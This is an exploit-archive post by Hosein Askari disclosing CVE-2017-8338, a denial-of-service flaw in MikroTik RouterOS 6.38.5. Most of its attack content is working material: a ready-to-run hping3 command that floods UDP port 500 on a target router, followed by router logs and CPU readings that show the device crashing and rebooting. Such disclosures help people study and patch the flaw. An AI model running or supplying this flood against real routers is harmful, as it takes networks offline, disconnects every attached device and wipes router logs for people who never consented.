facebook facebook twitter rss

MikroTik RouterBoard V-6.38.5 Denial of Service

Author: Hosein Askari , Published: 05-05-2017
#Exploit Title: MikroTik RouterBoard V-6.38.5 Denial of Service
#CVE: CVE-2017-8338
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : V-6.38.5
#Exploit Tested on: Parrot Security OS
#Date: 04-05-2017
#Category: Network Appliance
#Author Mail : hosein.askari@aol.com
#Description: A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically.
###############
sudo hping3 --udp -p 6000 --destport 500 --flood [router IP]
#########################
#Log:
apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot
apr/27/2017 04:37:47 system,error,critical out of memory condition was detected
apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer
########################
#The sample of "CPU Usage" :
[admin@MikroTik] > system resource monitor
cpu-used: 100%
cpu-used-per-cpu: 100%
free-memory: 2487KiB

Best Regards

Like us on Facebook :